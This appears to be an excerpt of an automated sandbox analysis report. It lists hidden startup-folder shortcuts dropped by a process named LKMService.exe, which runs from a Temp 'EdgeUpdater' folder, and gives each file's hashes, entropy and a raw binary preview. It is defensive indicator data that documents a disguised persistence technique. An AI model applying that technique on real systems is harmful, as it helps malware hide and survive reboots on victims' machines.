Preview:	L..................F....".....X:3.....f>3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d827f342fe9c4f3d948a33ec240811fd.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:13 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.937689336067915
Encrypted:	false
SSDEEP:	24:8nhRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8fJD3lfAvRAt41vgHyg
MD5:	5ED8DB2584DC9D0921770713DC6E1965
SHA1:	E22492F6EFDA32AE1156D2B893889EB166772A7D
SHA-256:	BB3ECAEF89D94047B62DCA9FCAA8F9F0C2D00B16A4404D89182E62BDFA82B477
SHA-512:	DD94C50FD8AEC3B2189030439329974D8837AE373A5657A20DB5D0439CA12FF8966F9454E6FC6D441508298A8F422DEC79432343D262B2372EFEEE849CE0682F
Malicious:	false
Preview:	L..................F....".....X:3.../.._3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d97d239314814309aa82de22ff2626e0.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:36 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.936352962247597
Encrypted:	false
SSDEEP:	24:8DURJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8DSJD3lfAvRAt41vgHyg
MD5:	1AE524470AB51B70D1DFF433534FD72E
SHA1:	ABB1DD3FD9135D97EE80B43A3393DC1CC91CE573
SHA-256:	DE7B66DAC3865D96559A57D1DABD0FB7C9947B0691C73B4D1B89E3E2D1F7F452
SHA-512:	B9934DFC53A2E6023244097A000AEC0152934ED8731AFE33EE0FD06048EAC3E75A62B478C1C170952ACE0E3EBAC736DD0AD77A352F72AB8EA494E2372D8D051D
Malicious:	false
Preview:	L..................F....".....X:3...`F.I3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d9ae47459b854ee78156fea739ee2eba.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:37 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.938338241735561
Encrypted:	false
SSDEEP:	24:8ARJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8WJD3lfAvRAt41vgHyg
MD5:	C456C49CEE8C0B06AE12D22BC211B471
SHA1:	AE29C60B3E2A1A756B8B7C9AA54B03060DC6A279
SHA-256:	6C4B045AC75FEEC6F0409A8CE118966853C5844FEF4FC6F3D7544812272406A3
SHA-512:	2FDA9B71995C25D310AC2ABE226B7688E74E8544DA7D88CAFE8ABEAAB05C07661DE00AE73281674D7B1567949BDE6AF952F6AD49BD26F1AD07B399B967836BE7
Malicious:	false
Preview:	L..................F....".....X:3.....J3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e473bf015e6148daa821e9cdba096597.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:04 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.9424112556591915
Encrypted:	false
SSDEEP:	24:8rRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8dJD3lfAvRAt41vgHyg
MD5:	B0E2D74ECCEA78A3A7CE0C8AB203C74A
SHA1:	ED8816E8F0EDAE6BC41309F3C66AE2C3F028ED61
SHA-256:	42936B6224CA2BC564B81095F6F2431E9A973A859EAA6250A575CF4539F9324B
SHA-512:	CEB7E07176BC2DB921CB0F2212B8B03CFA50474B1EE2B97D7C17FD511B14341F4090347A2EBC0479293CFC5AE556C82D1F3745967095B177834E9E943A5390E0
Malicious:	false
Preview:	L..................F....".....X:3..../.Z3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e64ab677b62d4831a2902f3e6bff49df.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:35 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.940268576767644
Encrypted:	false
SSDEEP:	24:8gRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:82JD3lfAvRAt41vgHyg
MD5:	3459F31E9031B69ACFE7F20F5C3CF8AE
SHA1:	8BDD7FC92026C4ED96BAAF05315472418690C0E6
SHA-256:	DADB1576E02BB3DB2E95A64B137CAD470D074A278640D7A1CAE30C2D6A0DC42D
SHA-512:	46CF070A651F07C1655FEAAD734C013D06498D06DBFD5C26CE8E1FCB8DF685869B2A2B85EE60CFFFDC43198F7D1CC6992D7C8D1739CE9FD0F2E73298EC4A2BFE
Malicious:	false
Preview:	L..................F....".....X:3...!.YI3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ec7e774008154f3596c8e5c3ca65b43a.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:11 2024, mtime=Thu Oct 3 00:26:11 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1203
Entropy (8bit):	4.904215973046557
Encrypted:	false
SSDEEP:	24:8Pb+VPJD3lXPXQvRXgK4KZyAksaUaPMvqygm:8PbAJD3lfAvRAiRoUa/yg
MD5:	F6309C5E9A173BBB73AA0F7409CDA4F5
SHA1:	B280A8E2220760C572D5D47255DDBF4ABC653A29
SHA-256:	60069743EBB192B415164AD408524FF367B937F5FB9974F8F5BD61F9D2F6E4C4
SHA-512:	76846A24AB5A57921BF5AAF0384E327134DC1BB367A4CA69E239D24958B96E3FDA94D1F6E4B7782E4023F1AAEEEB10977CF98ED0B6C8A1078608A43009918AA0
Malicious:	false
Preview:	L..................F...."....:3....:3...<..93...........................,.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...........................BS..E.d.g.e.U.p.d.a.t.e.r.....p.2.....CYE.".GOOGLE~1.EXE..T......CYF.CYF.....9.......................^.G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.......q...............-.......p...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe..:.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.G.o.o.g.l.e.U.p.d.a.t.e.r...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... .....Jc...-...-$..hT..CrF.f4... .....Jc...-...-$............

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ed539e9b377a47aebbf43d3ea0cb839e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:42 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.935778386624045
Encrypted:	false
SSDEEP:	24:8mRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8wJD3lfAvRAt41vgHyg
MD5:	F71284209B953A566472D6B57870F67E
SHA1:	5A9248ED7F6E06C11DF86746BC34D99DAF09EA38
SHA-256:	794E4E65F41AFFD34765F94BC7AAA92BEBF88AEE52B2729F0DDA952C4A25DB4D
SHA-512:	1E1A906CA8ACD8443370CC6359FEFD310683EF1A5DB69853863A946946C7ADDB1AF546D11DF3C0BAC83B7B38FA77D132C618904BF21B9DE376A7356256ADBB83
Malicious:	false
Preview:	L..................F....".....X:3....30M3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ee6262db977148f9b6ce41041a0fbdf7.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:57 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.937996177799057
Encrypted:	false
SSDEEP:	24:8MRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8aJD3lfAvRAt41vgHyg
MD5:	F77E0BD34A47D7F59FB0D86F74CF7EF9
SHA1:	D5B48E63A5BD84E39930DACC0EA1C0CEF9C0A5E0
SHA-256:	6B3F69412DE0E5DFD06A873AEF546B9BF713F8D46D67AEB9E02F67336F005095
SHA-512:	9A7CAFFA9814B0CC986F25DF1055171ACE3A8DD3AF9DBD77D24B00DE45DA062BE938E2D373521A131933784D05936C0425F4749E54A1F9F2E03B087BB27AA3DB
Malicious:	false
Preview:	L..................F....".....X:3.....V3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f259adaf5ff645509c195bf263dfd55e.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:30 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.93525835784918
Encrypted:	false
SSDEEP:	24:8XRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8BJD3lfAvRAt41vgHyg
MD5:	87DB89F6EB87B54F4CB7EC7BF79DECE7
SHA1:	C07FAE479A706400FA09F287018A68387B2CD9A8
SHA-256:	C7EC0D4AACDC7E14A8093263408AF4097E3E1812D210665A2DD0635A3CECF05F
SHA-512:	7301CAF683702A63E8153BEDC2D66053AABF5A696574112761CD767ABD39CF055646B272DA66FDC6272D205529AF500BC339F97B902B616484E8D155E0BA8C8A
Malicious:	false
Preview:	L..................F....".....X:3...p..F3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f398b917ebdf42d684e3df08d449596d.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:39 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.934629174432057
Encrypted:	false
SSDEEP:	24:87+hRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:87EJD3lfAvRAt41vgHyg
MD5:	C4471C3CE3E0BD0AC095F4071FDFA76E
SHA1:	9772730DA7B1FCF833AD6946F072CCE57B637434
SHA-256:	7981BD0FF9DE5BE29D7BABF5EF545EE32F2CD5BD39E0EA8EB1D061930AFF32C4
SHA-512:	E05E5024B15CA97DFF43C6B4B843B066FC1EC33BE492D12A71F78BD0C44C19A98810A05B97C7DCEBC5E84B32F7C4C2825F726918F8B63EB229CED2361C3825A4
Malicious:	false
Preview:	L..................F....".....X:3......K3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f5a844d131a542409d15c7be5595addc.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:03 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.939888980892903
Encrypted:	false
SSDEEP:	24:8TRRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8TPJD3lfAvRAt41vgHyg
MD5:	DCB0B9B029662EF986E78B35B99647FF
SHA1:	F236505ECF71EA00DF3469536F58C38EB3D23B6D
SHA-256:	6D4337A15777DCFBA5C9F8C2E23FDFFA92418FB1B54410A06F42EB5E2C239ACA
SHA-512:	252EFA3B1CC6DDD338CADBAE6755C3630DCDC7960C097B33C04FF57FE3E90222279DD49243383CD74B15A4B2B37EDBAE12BF7AE57E73B44B0E5E9126EED7C8B2
Malicious:	false
Preview:	L..................F....".....X:3....6AZ3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f619a40d28e44231bbc0b75adc7e6593.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:19 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.940811815819215
Encrypted:	false
SSDEEP:	24:8mRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8wJD3lfAvRAt41vgHyg
MD5:	72196D629A06F0015719ACA4BF4DBD1D
SHA1:	13FD85E503C0D22B81D00A371356B326079139DA
SHA-256:	1C33B4A303922F408879AA6E709770C384966D0EFCFA061F811D255E7CE8EE9A
SHA-512:	944F314BC1897897DBAD4ACB8125BE829A792A6C45D31CD4FE7DC3162B2DF264ED8E3BEC1B83A754DEEB8AB4ADDB1F5899E97178B0A9E0AD491AD577E48B9DA5
Malicious:	false
Preview:	L..................F....".....X:3......?3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fff188210d924c868774a26b37b1f9c9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:45 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.939719965614602
Encrypted:	false
SSDEEP:	24:8URJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8SJD3lfAvRAt41vgHyg
MD5:	B8ECDF4282352B523CF89F5645E89AA8
SHA1:	58A363B369C6771544CEDF6F3C87681B15D2EDE3
SHA-256:	A6CDD79FDF177C269292CF8B75EEF97E0ED2CC12C18EBB98D19C483310E3CEDA
SHA-512:	E436F28D8CBF87DA790E789DAC0607D7A4878EE34C1BA0A26BB1E935332C6A2F573B36D0A37D20933EF9CFCCC78DFC7FCC27861582946BA487E418EC77B30D78
Malicious:	false
